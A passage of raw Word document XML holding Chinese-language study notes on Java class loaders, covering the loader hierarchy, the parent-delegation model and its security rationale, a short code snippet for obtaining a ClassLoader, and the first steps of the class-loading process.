          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C#</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标准库中的类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>- - ExtClassLoader //</w:t>
      </w:r>
      <w:r w:rsidR="001D03B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>扩展类加载器</w:t>
      </w:r>
      <w:r w:rsidR="0067774E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责加载扩展类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就是继承类和实现类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>- - AppClassLoader //</w:t>
      </w:r>
      <w:r w:rsidR="0067774E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统类加载器</w:t>
      </w:r>
      <w:r w:rsidR="0067774E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责加载应用类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序员自定义的类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00F24D31">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三个加载器各自完成自己的工作，但它们是如何协调工作呢？哪一个类该由哪个类加载器完成呢？为了解决这个问题，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采用了委托模型机制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00F24D31">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>委托模型机制的工作原理很简单：当类加载器需要加载类的时候，先请示其</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Parent(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即上一层加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在其搜索路径载入，如果找不到，才在自己的搜索路径搜索该类。这样的顺序其实就是加载器层次上自顶而下的搜索，因为加载器必须保证基础类的加载。之所以是这种机制，还有一个安全上的考虑：如果某人将一个恶意的基础类加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，委托模型机制会搜索其父类加载器，显然是不可能找到的，自然就不会将该类加载进来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们可以通过这样的代码来获取类加载器:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00F24D31">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader loader = ClassName.class.getClassLoader();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoader ParentLoader = loader.getParent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRDefault="00F24D31" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注意一个很重要的问题，就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在逻辑上并不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BootstrapKLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的实体！因为它是用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写的，所以打印其内容将会得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRDefault="00F24D31" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前面是对类加载器的简单介绍，它的原理机制非常简单，就是下面几个步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRPr="00A3303D" w:rsidRDefault="00CB2D46" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、加载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRDefault="00CB2D46" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B804C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全限定名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来获取定义此类的二进制字节流；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRDefault="00CB2D46" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将这个字节流所代表的静态存储结构转化为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB148F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的运行时数据结构</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRDefault="00CB2D46" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000F2F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在内存中生成</w:t>
      </w:r>
      <w:r w:rsidR="00CB148F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CB148F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例化</w:t>
      </w:r>
      <w:r w:rsidR="00CB148F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一个代表类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
